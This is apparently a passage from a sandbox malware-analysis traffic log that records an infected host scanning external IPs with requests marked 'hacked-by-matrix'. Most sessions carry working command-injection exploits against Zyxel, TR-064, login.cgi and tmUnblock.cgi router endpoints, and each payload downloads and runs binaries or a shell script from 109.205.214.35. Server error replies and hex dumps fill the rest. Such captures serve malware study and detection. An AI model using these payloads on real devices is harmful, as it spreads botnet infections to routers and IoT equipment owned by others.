62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 64 65 76 31 35 2e 6e 65 77 65 67 6f 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.56 (Debian) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:22:27 GMTServer: Apache/2.4.56 (Debian)Content-Length: 307Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at dev15.newego.de Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        458192.168.2.133771280.211.181.8580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:27.577244043 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:27.766486883 CET968INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 04:22:27 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                        Content-Length: 217
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 32 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 28 43 65 6e 74 4f 53 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 30 2e 32 6b 2d 66 69 70 73 20 50 48 50 2f 35 2e 34 2e 31 36 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 2f 66 72 65 65 70 62 78 2f 65 72 72 6f 72 2e 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 33 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 2f 66 72 65 65 70 62 78 2f 65 72 72 6f 72 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 301 Moved PermanentlyDate: Thu, 21 Mar 2024 04:22:27 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16Location: https:///freepbx/error.htmlContent-Length: 235Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https:///freepbx/error.html">here</a>.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        459192.168.2.1358074213.16.62.21480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:27.591387033 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:27.798954964 CET123INHTTP/1.1 401 Unauthorized
                                                        WWW-Authenticate: Basic realm="Device_CGI"
                                                        CONNECTION: close
                                                        CONTENT-LENGTH: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        460192.168.2.1350480213.187.32.5880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:27.776424885 CET32INData Raw: 28 52 65 66 2e 49 64 3a 20 3f 73 4b 66 59 52 73 43 34 4d 34 61 32 57 38 50 61 43 34 7a 46 3f 29
                                                        Data Ascii: (Ref.Id: ?sKfYRsC4M4a2W8PaC4zF?)


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        461192.168.2.1342050118.35.234.767547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:28.101614952 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:29.708256960 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        462192.168.2.133671083.166.130.9880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:28.101783037 CET219INHTTP/1.1 400 Bad request
                                                        content-length: 90
                                                        cache-control: no-cache
                                                        content-type: text/html
                                                        connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        463192.168.2.1349930212.19.166.16080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:28.655982971 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:29.179275036 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:29.680413961 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        464192.168.2.1358296184.174.37.1038080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:28.686237097 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:29.708256960 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        465192.168.2.134479882.223.134.23880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:28.686503887 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:29.712258101 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:29.895603895 CET399INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.21.4
                                                        Date: Thu, 21 Mar 2024 04:22:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 169
                                                        Connection: keep-alive
                                                        Location: https://www.acierto.com/cgi-bin/ViewLog.asp
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.21.4</center></body></html>
                                                        Mar 21, 2024 05:22:29.895623922 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.21.4
                                                        Date: Thu, 21 Mar 2024 04:22:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.4</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        466192.168.2.1360230212.12.19.13980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:28.732940912 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:28.981699944 CET407INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:29 GMT
                                                        Server: Apache/2.4.58 (Win64)
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        467192.168.2.133751880.147.204.24180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:28.879522085 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:29.067555904 CET805INHTTP/1.1 403 Forbidden
                                                        Date: Thu, 21 Mar 2024 04:22:28 GMT
                                                        Server: Apache
                                                        Content-Length: 199
                                                        Keep-Alive: timeout=15, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 32 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:22:28 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        468192.168.2.133618299.243.225.597547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:28.939188004 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        469192.168.2.1334968178.128.65.19780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.040889978 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
